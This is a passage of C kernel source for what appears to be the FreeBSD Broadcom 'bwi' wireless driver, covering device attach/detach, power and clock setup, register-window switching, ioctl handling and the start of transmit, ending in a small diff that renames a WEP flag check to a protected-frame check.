sc->sc_dev; struct ifnet *ifp; struct bwi_mac *mac; struct bwi_phy *phy; int i, error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; BWI_LOCK_INIT(sc); /* * Initialize taskq and various tasks */ sc->sc_tq = taskqueue_create("bwi_taskq", M_NOWAIT | M_ZERO, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", device_get_nameunit(dev)); TASK_INIT(&sc->sc_restart_task, 0, bwi_restart, sc); callout_init_mtx(&sc->sc_calib_ch, &sc->sc_mtx, 0); /* * Initialize sysctl variables */ sc->sc_fw_version = BWI_FW_VERSION3; sc->sc_led_idle = (2350 * hz) / 1000; sc->sc_led_blink = 1; sc->sc_txpwr_calib = 1; #ifdef BWI_DEBUG sc->sc_debug = bwi_debug; #endif bwi_power_on(sc, 1); error = bwi_bbp_attach(sc); if (error) goto fail; error = bwi_bbp_power_on(sc, BWI_CLOCK_MODE_FAST); if (error) goto fail; if (BWI_REGWIN_EXIST(&sc->sc_com_regwin)) { error = bwi_set_clock_delay(sc); if (error) goto fail; error = bwi_set_clock_mode(sc, BWI_CLOCK_MODE_FAST); if (error) goto fail; error = bwi_get_pwron_delay(sc); if (error) goto fail; } error = bwi_bus_attach(sc); if (error) goto fail; bwi_get_card_flags(sc); bwi_led_attach(sc); for (i = 0; i < sc->sc_nmac; ++i) { struct bwi_regwin *old; mac = &sc->sc_mac[i]; error = bwi_regwin_switch(sc, &mac->mac_regwin, &old); if (error) goto fail; error = bwi_mac_lateattach(mac); if (error) goto fail; error = bwi_regwin_switch(sc, old, NULL); if (error) goto fail; } /* * XXX First MAC is known to exist * TODO2 */ mac = &sc->sc_mac[0]; phy = &mac->mac_phy; bwi_bbp_power_off(sc); error = bwi_dma_alloc(sc); if (error) goto fail; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp 
== NULL) { device_printf(dev, "can not if_alloc()\n"); error = ENOSPC; goto fail; } ic = ifp->if_l2com; /* set these up early for if_printf use */ if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = bwi_init; ifp->if_ioctl = bwi_ioctl; ifp->if_start = bwi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); callout_init_mtx(&sc->sc_watchdog_timer, &sc->sc_mtx, 0); /* * Setup ratesets, phytype, channels and get MAC address */ bands = 0; if (phy->phy_mode == IEEE80211_MODE_11B || phy->phy_mode == IEEE80211_MODE_11G) { setbit(&bands, IEEE80211_MODE_11B); if (phy->phy_mode == IEEE80211_MODE_11B) { ic->ic_phytype = IEEE80211_T_DS; } else { ic->ic_phytype = IEEE80211_T_OFDM; setbit(&bands, IEEE80211_MODE_11G); } bwi_get_eaddr(sc, BWI_SPROM_11BG_EADDR, macaddr); if (IEEE80211_IS_MULTICAST(macaddr)) { bwi_get_eaddr(sc, BWI_SPROM_11A_EADDR, macaddr); if (IEEE80211_IS_MULTICAST(macaddr)) { device_printf(dev, "invalid MAC address: %6D\n", macaddr, ":"); } } } else if (phy->phy_mode == IEEE80211_MODE_11A) { /* TODO:11A */ setbit(&bands, IEEE80211_MODE_11A); error = ENXIO; goto fail; } else { panic("unknown phymode %d\n", phy->phy_mode); } /* Get locale */ sc->sc_locale = __SHIFTOUT(bwi_read_sprom(sc, BWI_SPROM_CARD_INFO), BWI_SPROM_CARD_INFO_LOCALE); DPRINTF(sc, BWI_DBG_ATTACH, "locale: %d\n", sc->sc_locale); /* XXX use locale */ ieee80211_init_channels(ic, NULL, &bands); ic->ic_ifp = ifp; ic->ic_caps = IEEE80211_C_STA | IEEE80211_C_SHSLOT | IEEE80211_C_SHPREAMBLE | IEEE80211_C_WPA | IEEE80211_C_BGSCAN | IEEE80211_C_MONITOR; ic->ic_opmode = IEEE80211_M_STA; ieee80211_ifattach(ic, macaddr); ic->ic_headroom = sizeof(struct bwi_txbuf_hdr); /* override default methods */ ic->ic_vap_create = bwi_vap_create; ic->ic_vap_delete = bwi_vap_delete; ic->ic_raw_xmit = bwi_raw_xmit; ic->ic_updateslot = bwi_updateslot; ic->ic_scan_start = bwi_scan_start; ic->ic_scan_end = bwi_scan_end; ic->ic_set_channel = bwi_set_channel; sc->sc_rates = ieee80211_get_ratetable(ic->ic_curchan); ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), BWI_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), BWI_RX_RADIOTAP_PRESENT); /* * Add sysctl nodes */ SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "fw_version", CTLFLAG_RD, &sc->sc_fw_version, 0, "Firmware version"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "led_idle", CTLFLAG_RW, &sc->sc_led_idle, 0, "# ticks before LED enters idle state"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "led_blink", CTLFLAG_RW, &sc->sc_led_blink, 0, "Allow LED to blink"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "txpwr_calib", CTLFLAG_RW, &sc->sc_txpwr_calib, 0, "Enable software TX power calibration"); #ifdef BWI_DEBUG SYSCTL_ADD_UINT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "Debug flags"); #endif if (bootverbose) ieee80211_announce(ic); return (0); fail: BWI_LOCK_DESTROY(sc); return (error); } int bwi_detach(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i; bwi_stop(sc, 1); callout_drain(&sc->sc_led_blink_ch); callout_drain(&sc->sc_calib_ch); 
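        /*
         * NB: assuming standard callout(9) semantics, callout_drain()
         * (unlike callout_stop()) also waits for a handler that is already
         * running to return.  bwi_stop() above has quiesced the hardware,
         * so once these timers are drained none of them can fire again
         * while ieee80211_ifdetach(), bwi_mac_detach(), bwi_dma_free() and
         * if_free() below release their state.
         */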
callout_drain(&sc->sc_watchdog_timer); ieee80211_ifdetach(ic); for (i = 0; i < sc->sc_nmac; ++i) bwi_mac_detach(&sc->sc_mac[i]); bwi_dma_free(sc); if_free(ifp); taskqueue_free(sc->sc_tq); BWI_LOCK_DESTROY(sc); return (0); } static struct ieee80211vap * bwi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct bwi_vap *bvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; bvp = (struct bwi_vap *) malloc(sizeof(struct bwi_vap), M_80211_VAP, M_WAITOK | M_ZERO); if (bvp == NULL) return NULL; vap = &bvp->bv_vap; /* enable s/w bmiss handling for sta mode */ ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac); /* override default methods */ bvp->bv_newstate = vap->iv_newstate; vap->iv_newstate = bwi_newstate; #if 0 vap->iv_update_beacon = bwi_beacon_update; #endif ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, bwi_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void bwi_vap_delete(struct ieee80211vap *vap) { struct bwi_vap *bvp = BWI_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(bvp, M_80211_VAP); } void bwi_suspend(struct bwi_softc *sc) { bwi_stop(sc, 1); } void bwi_resume(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) bwi_init(sc); } int bwi_shutdown(struct bwi_softc *sc) { bwi_stop(sc, 1); return 0; } static void bwi_power_on(struct bwi_softc *sc, int with_pll) { uint32_t gpio_in, gpio_out, gpio_en; uint16_t status; gpio_in = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_IN, 4); if (gpio_in & BWI_PCIM_GPIO_PWR_ON) goto back; gpio_out = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); gpio_en = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, 4); gpio_out |= BWI_PCIM_GPIO_PWR_ON; gpio_en |= BWI_PCIM_GPIO_PWR_ON; if (with_pll) { /* Turn off PLL first */ gpio_out |= BWI_PCIM_GPIO_PLL_PWR_OFF; gpio_en |= BWI_PCIM_GPIO_PLL_PWR_OFF; } pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, gpio_en, 4); DELAY(1000); if (with_pll) { /* Turn on PLL */ gpio_out &= ~BWI_PCIM_GPIO_PLL_PWR_OFF; pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); DELAY(5000); } back: /* Clear "Signaled Target Abort" */ status = pci_read_config(sc->sc_dev, PCIR_STATUS, 2); status &= ~PCIM_STATUS_STABORT; pci_write_config(sc->sc_dev, PCIR_STATUS, status, 2); } static int bwi_power_off(struct bwi_softc *sc, int with_pll) { uint32_t gpio_out, gpio_en; pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_IN, 4); /* dummy read */ gpio_out = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); gpio_en = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, 4); gpio_out &= ~BWI_PCIM_GPIO_PWR_ON; gpio_en |= BWI_PCIM_GPIO_PWR_ON; if (with_pll) { gpio_out |= BWI_PCIM_GPIO_PLL_PWR_OFF; gpio_en |= BWI_PCIM_GPIO_PLL_PWR_OFF; } pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, gpio_en, 4); return 0; } int bwi_regwin_switch(struct bwi_softc *sc, struct bwi_regwin *rw, struct bwi_regwin **old_rw) { int error; if (old_rw != NULL) *old_rw = NULL; if (!BWI_REGWIN_EXIST(rw)) return EINVAL; if (sc->sc_cur_regwin != rw) { error = bwi_regwin_select(sc, rw->rw_id); if (error) { device_printf(sc->sc_dev, "can't select regwin %d\n", rw->rw_id); return error; } } if (old_rw != 
NULL) *old_rw = sc->sc_cur_regwin; sc->sc_cur_regwin = rw; return 0; } static int bwi_regwin_select(struct bwi_softc *sc, int id) { uint32_t win = BWI_PCIM_REGWIN(id); int i; #define RETRY_MAX 50 for (i = 0; i < RETRY_MAX; ++i) { pci_write_config(sc->sc_dev, BWI_PCIR_SEL_REGWIN, win, 4); if (pci_read_config(sc->sc_dev, BWI_PCIR_SEL_REGWIN, 4) == win) return 0; DELAY(10); } #undef RETRY_MAX return ENXIO; } static void bwi_regwin_info(struct bwi_softc *sc, uint16_t *type, uint8_t *rev) { uint32_t val; val = CSR_READ_4(sc, BWI_ID_HI); *type = BWI_ID_HI_REGWIN_TYPE(val); *rev = BWI_ID_HI_REGWIN_REV(val); DPRINTF(sc, BWI_DBG_ATTACH, "regwin: type 0x%03x, rev %d, " "vendor 0x%04x\n", *type, *rev, __SHIFTOUT(val, BWI_ID_HI_REGWIN_VENDOR_MASK)); } static int bwi_bbp_attach(struct bwi_softc *sc) { #define N(arr) (int)(sizeof(arr) / sizeof(arr[0])) uint16_t bbp_id, rw_type; uint8_t rw_rev; uint32_t info; int error, nregwin, i; /* * Get 0th regwin information * NOTE: 0th regwin should exist */ error = bwi_regwin_select(sc, 0); if (error) { device_printf(sc->sc_dev, "can't select regwin 0\n"); return error; } bwi_regwin_info(sc, &rw_type, &rw_rev); /* * Find out BBP id */ bbp_id = 0; info = 0; if (rw_type == BWI_REGWIN_T_COM) { info = CSR_READ_4(sc, BWI_INFO); bbp_id = __SHIFTOUT(info, BWI_INFO_BBPID_MASK); BWI_CREATE_REGWIN(&sc->sc_com_regwin, 0, rw_type, rw_rev); sc->sc_cap = CSR_READ_4(sc, BWI_CAPABILITY); } else { for (i = 0; i < N(bwi_bbpid_map); ++i) { if (sc->sc_pci_did >= bwi_bbpid_map[i].did_min && sc->sc_pci_did <= bwi_bbpid_map[i].did_max) { bbp_id = bwi_bbpid_map[i].bbp_id; break; } } if (bbp_id == 0) { device_printf(sc->sc_dev, "no BBP id for device id " "0x%04x\n", sc->sc_pci_did); return ENXIO; } info = __SHIFTIN(sc->sc_pci_revid, BWI_INFO_BBPREV_MASK) | __SHIFTIN(0, BWI_INFO_BBPPKG_MASK); } /* * Find out number of regwins */ nregwin = 0; if (rw_type == BWI_REGWIN_T_COM && rw_rev >= 4) { nregwin = __SHIFTOUT(info, BWI_INFO_NREGWIN_MASK); } else { for (i = 0; i < N(bwi_regwin_count); ++i) { if (bwi_regwin_count[i].bbp_id == bbp_id) { nregwin = bwi_regwin_count[i].nregwin; break; } } if (nregwin == 0) { device_printf(sc->sc_dev, "no number of win for " "BBP id 0x%04x\n", bbp_id); return ENXIO; } } /* Record BBP id/rev for later using */ sc->sc_bbp_id = bbp_id; sc->sc_bbp_rev = __SHIFTOUT(info, BWI_INFO_BBPREV_MASK); sc->sc_bbp_pkg = __SHIFTOUT(info, BWI_INFO_BBPPKG_MASK); device_printf(sc->sc_dev, "BBP: id 0x%04x, rev 0x%x, pkg %d\n", sc->sc_bbp_id, sc->sc_bbp_rev, sc->sc_bbp_pkg); DPRINTF(sc, BWI_DBG_ATTACH, "nregwin %d, cap 0x%08x\n", nregwin, sc->sc_cap); /* * Create rest of the regwins */ /* Don't re-create common regwin, if it is already created */ i = BWI_REGWIN_EXIST(&sc->sc_com_regwin) ? 
1 : 0; for (; i < nregwin; ++i) { /* * Get regwin information */ error = bwi_regwin_select(sc, i); if (error) { device_printf(sc->sc_dev, "can't select regwin %d\n", i); return error; } bwi_regwin_info(sc, &rw_type, &rw_rev); /* * Try attach: * 1) Bus (PCI/PCIE) regwin * 2) MAC regwin * Ignore rest types of regwin */ if (rw_type == BWI_REGWIN_T_BUSPCI || rw_type == BWI_REGWIN_T_BUSPCIE) { if (BWI_REGWIN_EXIST(&sc->sc_bus_regwin)) { device_printf(sc->sc_dev, "bus regwin already exists\n"); } else { BWI_CREATE_REGWIN(&sc->sc_bus_regwin, i, rw_type, rw_rev); } } else if (rw_type == BWI_REGWIN_T_MAC) { /* XXX ignore return value */ bwi_mac_attach(sc, i, rw_rev); } } /* At least one MAC shold exist */ if (!BWI_REGWIN_EXIST(&sc->sc_mac[0].mac_regwin)) { device_printf(sc->sc_dev, "no MAC was found\n"); return ENXIO; } KASSERT(sc->sc_nmac > 0, ("no mac's")); /* Bus regwin must exist */ if (!BWI_REGWIN_EXIST(&sc->sc_bus_regwin)) { device_printf(sc->sc_dev, "no bus regwin was found\n"); return ENXIO; } /* Start with first MAC */ error = bwi_regwin_switch(sc, &sc->sc_mac[0].mac_regwin, NULL); if (error) return error; return 0; #undef N } int bwi_bus_init(struct bwi_softc *sc, struct bwi_mac *mac) { struct bwi_regwin *old, *bus; uint32_t val; int error; bus = &sc->sc_bus_regwin; KASSERT(sc->sc_cur_regwin == &mac->mac_regwin, ("not cur regwin")); /* * Tell bus to generate requested interrupts */ if (bus->rw_rev < 6 && bus->rw_type == BWI_REGWIN_T_BUSPCI) { /* * NOTE: Read BWI_FLAGS from MAC regwin */ val = CSR_READ_4(sc, BWI_FLAGS); error = bwi_regwin_switch(sc, bus, &old); if (error) return error; CSR_SETBITS_4(sc, BWI_INTRVEC, (val & BWI_FLAGS_INTR_MASK)); } else { uint32_t mac_mask; mac_mask = 1 << mac->mac_id; error = bwi_regwin_switch(sc, bus, &old); if (error) return error; val = pci_read_config(sc->sc_dev, BWI_PCIR_INTCTL, 4); val |= mac_mask << 8; pci_write_config(sc->sc_dev, BWI_PCIR_INTCTL, val, 4); } if (sc->sc_flags & BWI_F_BUS_INITED) goto back; if (bus->rw_type == BWI_REGWIN_T_BUSPCI) { /* * Enable prefetch and burst */ CSR_SETBITS_4(sc, BWI_BUS_CONFIG, BWI_BUS_CONFIG_PREFETCH | BWI_BUS_CONFIG_BURST); if (bus->rw_rev < 5) { struct bwi_regwin *com = &sc->sc_com_regwin; /* * Configure timeouts for bus operation */ /* * Set service timeout and request timeout */ CSR_SETBITS_4(sc, BWI_CONF_LO, __SHIFTIN(BWI_CONF_LO_SERVTO, BWI_CONF_LO_SERVTO_MASK) | __SHIFTIN(BWI_CONF_LO_REQTO, BWI_CONF_LO_REQTO_MASK)); /* * If there is common regwin, we switch to that regwin * and switch back to bus regwin once we have done. 
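                         * (The PCI register window exposes one core's
                         * register block at a time, so any access to the
                         * common core's registers has to be bracketed by a
                         * switch/restore pair.  A minimal sketch of that
                         * pattern, using the bwi_regwin_switch() helper
                         * defined earlier in this file -- 'prev' is only an
                         * illustrative name:
                         *
                         *      struct bwi_regwin *prev;
                         *
                         *      if (bwi_regwin_switch(sc, com, &prev) == 0) {
                         *              ... touch common-core registers ...
                         *              bwi_regwin_switch(sc, prev, NULL);
                         *      }
                         *
                         * The code below passes NULL instead and switches
                         * back to 'bus' explicitly once it is done.)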
*/ if (BWI_REGWIN_EXIST(com)) { error = bwi_regwin_switch(sc, com, NULL); if (error) return error; } /* Let bus know what we have changed */ CSR_WRITE_4(sc, BWI_BUS_ADDR, BWI_BUS_ADDR_MAGIC); CSR_READ_4(sc, BWI_BUS_ADDR); /* Flush */ CSR_WRITE_4(sc, BWI_BUS_DATA, 0); CSR_READ_4(sc, BWI_BUS_DATA); /* Flush */ if (BWI_REGWIN_EXIST(com)) { error = bwi_regwin_switch(sc, bus, NULL); if (error) return error; } } else if (bus->rw_rev >= 11) { /* * Enable memory read multiple */ CSR_SETBITS_4(sc, BWI_BUS_CONFIG, BWI_BUS_CONFIG_MRM); } } else { /* TODO:PCIE */ } sc->sc_flags |= BWI_F_BUS_INITED; back: return bwi_regwin_switch(sc, old, NULL); } static void bwi_get_card_flags(struct bwi_softc *sc) { #define PCI_VENDOR_APPLE 0x106b #define PCI_VENDOR_DELL 0x1028 sc->sc_card_flags = bwi_read_sprom(sc, BWI_SPROM_CARD_FLAGS); if (sc->sc_card_flags == 0xffff) sc->sc_card_flags = 0; if (sc->sc_pci_subvid == PCI_VENDOR_DELL && sc->sc_bbp_id == BWI_BBPID_BCM4301 && sc->sc_pci_revid == 0x74) sc->sc_card_flags |= BWI_CARD_F_BT_COEXIST; if (sc->sc_pci_subvid == PCI_VENDOR_APPLE && sc->sc_pci_subdid == 0x4e && /* XXX */ sc->sc_pci_revid > 0x40) sc->sc_card_flags |= BWI_CARD_F_PA_GPIO9; DPRINTF(sc, BWI_DBG_ATTACH, "card flags 0x%04x\n", sc->sc_card_flags); #undef PCI_VENDOR_DELL #undef PCI_VENDOR_APPLE } static void bwi_get_eaddr(struct bwi_softc *sc, uint16_t eaddr_ofs, uint8_t *eaddr) { int i; for (i = 0; i < 3; ++i) { *((uint16_t *)eaddr + i) = htobe16(bwi_read_sprom(sc, eaddr_ofs + 2 * i)); } } static void bwi_get_clock_freq(struct bwi_softc *sc, struct bwi_clock_freq *freq) { struct bwi_regwin *com; uint32_t val; u_int div; int src; bzero(freq, sizeof(*freq)); com = &sc->sc_com_regwin; KASSERT(BWI_REGWIN_EXIST(com), ("regwin does not exist")); KASSERT(sc->sc_cur_regwin == com, ("wrong regwin")); KASSERT(sc->sc_cap & BWI_CAP_CLKMODE, ("wrong clock mode")); /* * Calculate clock frequency */ src = -1; div = 0; if (com->rw_rev < 6) { val = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); if (val & BWI_PCIM_GPIO_OUT_CLKSRC) { src = BWI_CLKSRC_PCI; div = 64; } else { src = BWI_CLKSRC_CS_OSC; div = 32; } } else if (com->rw_rev < 10) { val = CSR_READ_4(sc, BWI_CLOCK_CTRL); src = __SHIFTOUT(val, BWI_CLOCK_CTRL_CLKSRC); if (src == BWI_CLKSRC_LP_OSC) { div = 1; } else { div = (__SHIFTOUT(val, BWI_CLOCK_CTRL_FDIV) + 1) << 2; /* Unknown source */ if (src >= BWI_CLKSRC_MAX) src = BWI_CLKSRC_CS_OSC; } } else { val = CSR_READ_4(sc, BWI_CLOCK_INFO); src = BWI_CLKSRC_CS_OSC; div = (__SHIFTOUT(val, BWI_CLOCK_INFO_FDIV) + 1) << 2; } KASSERT(src >= 0 && src < BWI_CLKSRC_MAX, ("bad src %d", src)); KASSERT(div != 0, ("div zero")); DPRINTF(sc, BWI_DBG_ATTACH, "clksrc %s\n", src == BWI_CLKSRC_PCI ? "PCI" : (src == BWI_CLKSRC_LP_OSC ? "LP_OSC" : "CS_OSC")); freq->clkfreq_min = bwi_clkfreq[src].freq_min / div; freq->clkfreq_max = bwi_clkfreq[src].freq_max / div; DPRINTF(sc, BWI_DBG_ATTACH, "clkfreq min %u, max %u\n", freq->clkfreq_min, freq->clkfreq_max); } static int bwi_set_clock_mode(struct bwi_softc *sc, enum bwi_clock_mode clk_mode) { struct bwi_regwin *old, *com; uint32_t clk_ctrl, clk_src; int error, pwr_off = 0; com = &sc->sc_com_regwin; if (!BWI_REGWIN_EXIST(com)) return 0; if (com->rw_rev >= 10 || com->rw_rev < 6) return 0; /* * For common regwin whose rev is [6, 10), the chip * must be capable to change clock mode. 
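         * The clock modes requested elsewhere in this file map onto
         * BWI_CLOCK_CTRL bits as follows: FAST clears SLOW and sets IGNPLL
         * (run at full rate regardless of the PLL), SLOW sets SLOW, and DYN
         * clears SLOW/IGNPLL/NODYN so the chip may switch on its own.  FAST
         * is requested around MAC initialization and DYN afterwards (see
         * bwi_init_statechg()); rev < 6 parts are configured through PCI
         * GPIO instead and rev >= 10 parts use BWI_CLOCK_INFO (cf.
         * bwi_get_clock_freq()), which is why both returned early above.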
*/ if ((sc->sc_cap & BWI_CAP_CLKMODE) == 0) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; if (clk_mode == BWI_CLOCK_MODE_FAST) bwi_power_on(sc, 0); /* Don't turn on PLL */ clk_ctrl = CSR_READ_4(sc, BWI_CLOCK_CTRL); clk_src = __SHIFTOUT(clk_ctrl, BWI_CLOCK_CTRL_CLKSRC); switch (clk_mode) { case BWI_CLOCK_MODE_FAST: clk_ctrl &= ~BWI_CLOCK_CTRL_SLOW; clk_ctrl |= BWI_CLOCK_CTRL_IGNPLL; break; case BWI_CLOCK_MODE_SLOW: clk_ctrl |= BWI_CLOCK_CTRL_SLOW; break; case BWI_CLOCK_MODE_DYN: clk_ctrl &= ~(BWI_CLOCK_CTRL_SLOW | BWI_CLOCK_CTRL_IGNPLL | BWI_CLOCK_CTRL_NODYN); if (clk_src != BWI_CLKSRC_CS_OSC) { clk_ctrl |= BWI_CLOCK_CTRL_NODYN; pwr_off = 1; } break; } CSR_WRITE_4(sc, BWI_CLOCK_CTRL, clk_ctrl); if (pwr_off) bwi_power_off(sc, 0); /* Leave PLL as it is */ return bwi_regwin_switch(sc, old, NULL); } static int bwi_set_clock_delay(struct bwi_softc *sc) { struct bwi_regwin *old, *com; int error; com = &sc->sc_com_regwin; if (!BWI_REGWIN_EXIST(com)) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; if (sc->sc_bbp_id == BWI_BBPID_BCM4321) { if (sc->sc_bbp_rev == 0) CSR_WRITE_4(sc, BWI_CONTROL, BWI_CONTROL_MAGIC0); else if (sc->sc_bbp_rev == 1) CSR_WRITE_4(sc, BWI_CONTROL, BWI_CONTROL_MAGIC1); } if (sc->sc_cap & BWI_CAP_CLKMODE) { if (com->rw_rev >= 10) { CSR_FILT_SETBITS_4(sc, BWI_CLOCK_INFO, 0xffff, 0x40000); } else { struct bwi_clock_freq freq; bwi_get_clock_freq(sc, &freq); CSR_WRITE_4(sc, BWI_PLL_ON_DELAY, howmany(freq.clkfreq_max * 150, 1000000)); CSR_WRITE_4(sc, BWI_FREQ_SEL_DELAY, howmany(freq.clkfreq_max * 15, 1000000)); } } return bwi_regwin_switch(sc, old, NULL); } static void bwi_init(void *xsc) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; BWI_LOCK(sc); bwi_init_statechg(sc, 1); BWI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void bwi_init_statechg(struct bwi_softc *sc, int statechg) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; int error; bwi_stop_locked(sc, statechg); bwi_bbp_power_on(sc, BWI_CLOCK_MODE_FAST); /* TODO: 2 MAC */ mac = &sc->sc_mac[0]; error = bwi_regwin_switch(sc, &mac->mac_regwin, NULL); if (error) { if_printf(ifp, "%s: error %d on regwin switch\n", __func__, error); goto bad; } error = bwi_mac_init(mac); if (error) { if_printf(ifp, "%s: error %d on MAC init\n", __func__, error); goto bad; } bwi_bbp_power_on(sc, BWI_CLOCK_MODE_DYN); bwi_set_bssid(sc, bwi_zero_addr); /* Clear BSSID */ bwi_set_addr_filter(sc, BWI_ADDR_FILTER_MYADDR, IF_LLADDR(ifp)); bwi_mac_reset_hwkeys(mac); if ((mac->mac_flags & BWI_MAC_F_HAS_TXSTATS) == 0) { int i; #define NRETRY 1000 /* * Drain any possible pending TX status */ for (i = 0; i < NRETRY; ++i) { if ((CSR_READ_4(sc, BWI_TXSTATUS0) & BWI_TXSTATUS0_VALID) == 0) break; CSR_READ_4(sc, BWI_TXSTATUS1); } if (i == NRETRY) if_printf(ifp, "%s: can't drain TX status\n", __func__); #undef NRETRY } if (mac->mac_phy.phy_mode == IEEE80211_MODE_11G) bwi_mac_updateslot(mac, 1); /* Start MAC */ error = bwi_mac_start(mac); if (error) { if_printf(ifp, "%s: error %d starting MAC\n", __func__, error); goto bad; } /* Clear stop flag before enabling interrupt */ sc->sc_flags &= ~BWI_F_STOP; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_timer, hz, bwi_watchdog, sc); /* Enable intrs */ bwi_enable_intrs(sc, BWI_INIT_INTRS); return; bad: bwi_stop_locked(sc, 1); } static int bwi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ 
        ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING))
        struct bwi_softc *sc = ifp->if_softc;
        struct ieee80211com *ic = ifp->if_l2com;
        struct ifreq *ifr = (struct ifreq *) data;
        int error = 0, startall = 0;

        switch (cmd) {
        case SIOCSIFFLAGS:
                BWI_LOCK(sc);
                if (IS_RUNNING(ifp)) {
                        struct bwi_mac *mac;
                        int promisc = -1;

                        KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC,
                            ("current regwin type %d",
                             sc->sc_cur_regwin->rw_type));
                        mac = (struct bwi_mac *)sc->sc_cur_regwin;

                        if ((ifp->if_flags & IFF_PROMISC) &&
                            (sc->sc_flags & BWI_F_PROMISC) == 0) {
                                promisc = 1;
                                sc->sc_flags |= BWI_F_PROMISC;
                        } else if ((ifp->if_flags & IFF_PROMISC) == 0 &&
                                   (sc->sc_flags & BWI_F_PROMISC)) {
                                promisc = 0;
                                sc->sc_flags &= ~BWI_F_PROMISC;
                        }

                        if (promisc >= 0)
                                bwi_mac_set_promisc(mac, promisc);
                }

                if (ifp->if_flags & IFF_UP) {
                        if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) {
                                bwi_init_statechg(sc, 1);
                                startall = 1;
                        }
                } else {
                        if (ifp->if_drv_flags & IFF_DRV_RUNNING)
                                bwi_stop_locked(sc, 1);
                }
                BWI_UNLOCK(sc);
                if (startall)
                        ieee80211_start_all(ic);
                break;
        case SIOCGIFMEDIA:
                error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd);
                break;
        case SIOCGIFADDR:
                error = ether_ioctl(ifp, cmd, data);
                break;
        default:
                error = EINVAL;
                break;
        }
        return error;
#undef IS_RUNNING
}

static void
bwi_start(struct ifnet *ifp)
{
        struct bwi_softc *sc = ifp->if_softc;

        BWI_LOCK(sc);
        bwi_start_locked(ifp);
        BWI_UNLOCK(sc);
}

static void
bwi_start_locked(struct ifnet *ifp)
{
        struct bwi_softc *sc = ifp->if_softc;
        struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING];
        struct ieee80211_frame *wh;
        struct ieee80211_node *ni;
        struct ieee80211_key *k;
        struct mbuf *m;
        int trans, idx;

        if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0)
                return;

        trans = 0;
        idx = tbd->tbd_idx;

        while (tbd->tbd_buf[idx].tb_mbuf == NULL) {
                IFQ_DRV_DEQUEUE(&ifp->if_snd, m);       /* XXX: LOCK */
                if (m == NULL)
                        break;

                ni = (struct ieee80211_node *) m->m_pkthdr.rcvif;
                wh = mtod(m, struct ieee80211_frame *);
-               if (wh->i_fc[1] & IEEE80211_FC1_WEP) {
+               if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) {
                        k = ieee80211_crypto_encap(ni, m);
                        if (k == NULL) {
                                ieee80211_free_node(ni);
                                m_freem(m);
                                ifp->if_oerrors++;
                                continue;
